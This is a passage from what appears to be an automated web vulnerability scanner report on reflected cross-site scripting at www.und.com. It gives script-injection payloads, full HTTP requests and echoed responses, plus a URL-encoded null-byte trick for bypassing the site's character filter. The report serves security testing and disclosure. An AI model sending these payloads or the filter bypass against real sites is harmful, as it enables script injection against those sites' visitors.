Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:28:54 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 34007

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/gametracker71bd4"><script>alert(1)</script>f100731304a/launch/','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.87. http://www.und.com/gametracker/launch/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.und.com
Path:	/gametracker/launch/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed840"><script>alert(1)</script>a1f143f8f78 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gametracker/launched840"><script>alert(1)</script>a1f143f8f78/ HTTP/1.1
Host: www.und.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:28:55 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 34007

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/gametracker/launched840"><script>alert(1)</script>a1f143f8f78/','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.88. http://www.und.com/nd.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.und.com
Path:	/nd.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 589ca"><script>alert(1)</script>85d9b50e458 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nd.ico589ca"><script>alert(1)</script>85d9b50e458 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:54:32 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 33958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/nd.ico589ca"><script>alert(1)</script>85d9b50e458','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.89. http://www.und.com/photogallery/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.und.com
Path:	/photogallery/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 141e8"><script>alert(1)</script>d67fe75be5d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /photogallery141e8"><script>alert(1)</script>d67fe75be5d/ HTTP/1.1
Host: www.und.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:27:59 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 33983

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/photogallery141e8"><script>alert(1)</script>d67fe75be5d/','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.90. http://www.und.com/sports/m-footbl/9873956 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.und.com
Path:	/sports/m-footbl/9873956

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11ba5"><script>alert(1)</script>fc13649fd00 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports11ba5"><script>alert(1)</script>fc13649fd00/m-footbl/9873956 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:45:49 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports11ba5"><script>alert(1)</script>fc13649fd00/m-footbl/9873956','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.91. http://www.und.com/sports/m-footbl/9873956 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.und.com
Path:	/sports/m-footbl/9873956

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f60b2"><script>alert(1)</script>7e2fb4e049d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footblf60b2"><script>alert(1)</script>7e2fb4e049d/9873956 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:45:49 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footblf60b2"><script>alert(1)</script>7e2fb4e049d/9873956','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.92. http://www.und.com/sports/m-footbl/9873956 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.und.com
Path:	/sports/m-footbl/9873956

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30b6e"><script>alert(1)</script>b2282aeecfa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbl/987395630b6e"><script>alert(1)</script>b2282aeecfa HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:54 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/987395630b6e"><script>alert(1)</script>b2282aeecfa','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.93. http://www.und.com/sports/m-footbl/9873956 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.und.com
Path:	/sports/m-footbl/9873956

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99832"><script>alert(1)</script>82a7a238541 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbl/9873956?99832"><script>alert(1)</script>82a7a238541=1 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:45:48 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 33922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/9873956?99832"><script>alert(1)</script>82a7a238541=1','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.94. http://www.und.com/sports/m-footbl/9874134 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.und.com
Path:	/sports/m-footbl/9874134

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0614"><script>alert(1)</script>104a0f6e999 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sportsd0614"><script>alert(1)</script>104a0f6e999/m-footbl/9874134 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:01:11 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sportsd0614"><script>alert(1)</script>104a0f6e999/m-footbl/9874134','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.95. http://www.und.com/sports/m-footbl/9874134 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.und.com
Path:	/sports/m-footbl/9874134

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34139"><script>alert(1)</script>b578545b794 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbl34139"><script>alert(1)</script>b578545b794/9874134 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:01:12 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl34139"><script>alert(1)</script>b578545b794/9874134','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.96. http://www.und.com/sports/m-footbl/9874134 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.und.com
Path:	/sports/m-footbl/9874134

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 984d1"><script>alert(1)</script>4b37886c489 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbl/9874134984d1"><script>alert(1)</script>4b37886c489 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:01:14 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/9874134984d1"><script>alert(1)</script>4b37886c489','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.97. http://www.und.com/sports/m-footbl/9874134 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.und.com
Path:	/sports/m-footbl/9874134

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88998"><script>alert(1)</script>57c6a7a77bc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbl/9874134?88998"><script>alert(1)</script>57c6a7a77bc=1 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:01:10 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 33922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/9874134?88998"><script>alert(1)</script>57c6a7a77bc=1','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.98. http://www.und.com/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.und.com
Path:	/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00172bf"><script>alert(1)</script>a3efd022b7f was submitted in the REST URL parameter 1. This input was echoed as 172bf"><script>alert(1)</script>a3efd022b7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /sports%00172bf"><script>alert(1)</script>a3efd022b7f/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:45 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34172

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports%00172bf"><script>alert(1)</script>a3efd022b7f/m-footbl/grfx.cstv.com/graphics/spacer.gif','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.99. http://www.und.com/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.und.com
Path:	/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00a3fe9"><script>alert(1)</script>b7e3c097217 was submitted in the REST URL parameter 2. This input was echoed as a3fe9"><script>alert(1)</script>b7e3c097217 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /sports/m-footbl%00a3fe9"><script>alert(1)</script>b7e3c097217/grfx.cstv.com/schools/nd/graphics/spacer.gif HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:46 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34274

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl%00a3fe9"><script>alert(1)</script>b7e3c097217/grfx.cstv.com/graphics/spacer.gif','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.100. http://www.und.com/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.und.com
Path:	/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %005370c"><script>alert(1)</script>1fbbb8b68cd was submitted in the REST URL parameter 3. This input was echoed as 5370c"><script>alert(1)</script>1fbbb8b68cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /sports/m-footbl/grfx.cstv.com%005370c"><script>alert(1)</script>1fbbb8b68cd/schools/nd/graphics/spacer.gif HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:45:35 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34193

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
